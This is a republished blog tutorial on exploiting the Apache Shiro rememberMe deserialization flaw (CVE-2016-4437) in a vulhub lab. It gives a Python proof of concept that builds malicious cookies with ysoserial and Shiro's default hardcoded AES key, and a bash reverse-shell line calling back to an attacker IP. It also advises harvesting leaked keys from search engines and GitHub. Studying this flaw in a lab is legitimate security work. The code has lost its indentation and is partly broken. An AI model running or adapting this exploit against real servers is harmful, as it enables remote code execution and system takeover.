Summary of Shiro Framework Vulnerabilities

Language 2023-08-18 21:12:32 views: null

1. Introduction to shiro framework:

     Apache Shiro is a powerful and easy-to-use Java security framework that can be used for authentication, authorization, encryption and session management. As long as rememberMe's AES encryption key is leaked, no matter what version of shiro it is, it will lead to a deserialization vulnerability. With Shiro's easy-to-understand API, you can quickly and easily get any app - from the smallest mobile app to the largest web and enterprise app.

2. Shiro vulnerability principle:

     The Apache Shiro framework provides the function of remembering me (RemeberMe). After the user logs in successfully, an encrypted and encoded cookie will be generated. The key of the cookie is RemeberMe, and the value of the cookie is formed by serializing relevant information, then encrypting it with aes, and finally encoding it with base64.

When receiving the cookie value on the server side, follow the steps below to parse it:

Retrieve the value of the RemeberMe cookie

Base64 decoding

Decrypt using ACE (encryption key is hardcoded)

Perform deserialization (without filtering)

Because no filtering is performed when calling deserialization, remote code execution vulnerabilities can be triggered.

After the user successfully logs in, an encrypted and encoded cookie will be generated. After receiving the cookie value on the server side, Base64 decoding --> AES decryption --> deserialization.

Therefore, as long as the attacker finds the AES encryption key, he can construct a malicious object, serialize it --> AES encryption --> Base64 encoding, and then send it as the rememberMe field of the cookie, and Shiro will decrypt the rememberMe And deserialization, eventually resulting in a deserialization vulnerability.

3. Shiro serialization utilization conditions

Due to the use of AES encryption, if you want to successfully exploit the vulnerability, you need to obtain the AES encryption key. However, in versions before shiro1.2.4, it is hard-coded, and the AES encryption key is in the code by default. The base64-encoded value of the default key is kPH+bIxk5D2deZiIxcaaaA==, here you can construct a malicious serialized object to encode, encrypt, and then encrypt and send it as a cookie. After receiving it, the server will decrypt it and trigger the deserialization vulnerability .

At present, many versions have been updated, but the official did not solve the deserialization vulnerability itself, but solved the vulnerability by removing the hard-coded key and making it generate a key each time. However, at present, some open source systems and tutorial sample codes use fixed codes, and many open source projects have integrated shiro internally and developed them for secondary development, which may reproduce the risk of the default fixed key of lower versions of shiro. For example, Shiro is integrated into the Guns open source framework for secondary development. The author customizes the key and fixes it. At this time, if the user does not modify the key, even if the Shiro version is upgraded, there is still the risk of fixing the key. Here you can collect keys through search engines and github to improve the success rate of vulnerability detection and utilization.

If there is a magic function in the deserialized object, using the unserialize() function will also trigger it. In this way, once we can control the unserialize() entry, it may lead to object injection vulnerabilities.

4. Shiro Vulnerability Fingerprint

 Assign any value to the rememberMe field in the Cookie of the request packet, and set-Cookie exists in the return packet: rememberMe=deleteMe

There is shiro in the URL

Sometimes the server will not take the initiative to return rememberMe=deleteMe, just send the package directly

 5. Shooting range construction

 We need to prepare a virtual machine, which must be equipped with docker. This virtual machine is the target machine, and then use docker to pull the vulhub shooting range. Take the CVE-2016-4437 vulnerability in the vulhub shooting range as an example, docker Installation tutorial and range pull tutorial: Vulhub - Docker-Compose file for vulnerability environment

6. Vulnerability attack

  1. You can use the shiro deserialization tool to find the key attack:

  2. You can also construct poc by yourself or search for poc on the Internet. Tools will be attached at the end of the article. First,
    install the python environment. This poc script involves two third-party libraries that need to be installed by yourself:
    pip installrequests
pip install -ihttps://pypi.douban.com/simplepycryptodome

    After the installation is complete, you can use poc to construct a malicious payload:
     

    import sys

import uuid

import base64

import subprocess

from Crypto.Cipher import AES

def encode_rememberme(command):

popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-BETA-all.jar','JRMPClient', command], stdout=subprocess.PIPE)      //这里使用了ysoserial工具包,它**了各种java反序列化payload,主要有CommonsCollections1-5、JRMPClient等模块

BS = AES.block_size

pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) %BS)).encode()

key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")

iv = uuid.uuid4().bytes

encryptor = AES.new(key, AES.MODE_CBC, iv)

file_body = pad(popen.stdout.read())

base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))

return base64_ciphertext

if __name__ == '__main__':

payload = encode_rememberme(sys.argv[1]) 

print"rememberMe={0}".format(payload.decode())

    Target ip: 192.168.23.168
    Attack ip: 192.168.23.193
     

    bash -i>& /dev/tcp/192.168.99.174/2333 0>&1

    Because the java environment does not support pipe characters, input and output redirection, etc., we need to code in advance through Java Runtime with bash:
     

  3. Here we use the JRMPClient module to construct cookies for malicious commands:

  4.  Listen to port 2333 on the attacking machine:
     

  5. After the rebound shell is processed and sent to the target machine, the CommonsCollections2 module needs to be used here:

  6. Replace the malicious cookie value generated above with the rememberMe after the target website captures the package, and then release the package:
     

  7. ​Check the attacking machine, and the shell has been obtained:
     

7. Reference tools and literature

Link: https://pan.baidu.com/s/1nCdPc0RarG9YZIVb_a-E9w

Extraction code: hn6o

8. Disclaimer

The procedures (methods) involved in the article may be offensive, and are only used for security research and teaching. If readers use their information for other purposes, the user shall bear all legal and joint liabilities, and the author of the article shall not bear any legal and joint liabilities.

Guess you like

Origin blog.csdn.net/zhuyi666/article/details/129683259
Recommended
Ranking
#2019110700005
What materials and procedures are required for patent transfer
What is the blockchain Ethereum triplet state root transaction root receipt root
Front-end study notes 04 --- About the insertion of html pictures and videos
Documents required for the filing of WeChat Mini Programs in special industries, the filing process of WeChat Mini Programs in special industries, how to file WeChat Mini Programs in special industries
2017 Qingdao-site tournament I The Squared Mosquito Coil
[BZOJ3165][HEOI2013]Segment (line segment tree without marking)
Kettle series: KettleEasyExpand, an open source Kettle universal plugin by Ma Jinju
The latest tutorial on making framework for iOS
DAX Section 6: Statistical Functions
Daily
More
2024-05-14(9)
2024-05-13(8)
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)

Code World

© 2018 codetd.com